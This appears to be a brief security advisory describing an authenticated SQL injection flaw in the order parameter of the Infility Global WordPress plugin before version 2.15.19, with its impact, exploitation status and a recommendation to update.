The Infility Global WordPress plugin versions prior to 2.15.19 fail to properly sanitize and escape parameters used in SQL statements, creating a true injection vulnerability. An attacker who can authenticate as a Subscriber or higher can supply malicious input via the order parameter, causing the plugin to execute arbitrary SQL commands on the database. This flaw can lead to data exfiltration, tampering, or possible escalation if the database credentials allow broader access to the underlying system.

Infility Global WordPress plugin versions earlier than 2.15.19 are affected. The vulnerability is present in the core plugin code and affects any site that installs the plugin before the mentioned version, regardless of other configuration.

The flaw is exploitable only by authenticated users with at least Subscriber privileges; the likely attack vector is an authenticated user exploiting the order interface to submit malicious content. No EPSS score is available and the vulnerability is not listed in the CISA KEV catalog, indicating no reported real-world exploitation at this time. However, the nature of SQL injection means that once an attacker obtains the necessary access, the risk to data confidentiality and integrity is high. Because an official patch has not been listed in the data provided, mitigation requires the deployment of a fixed plugin version if available.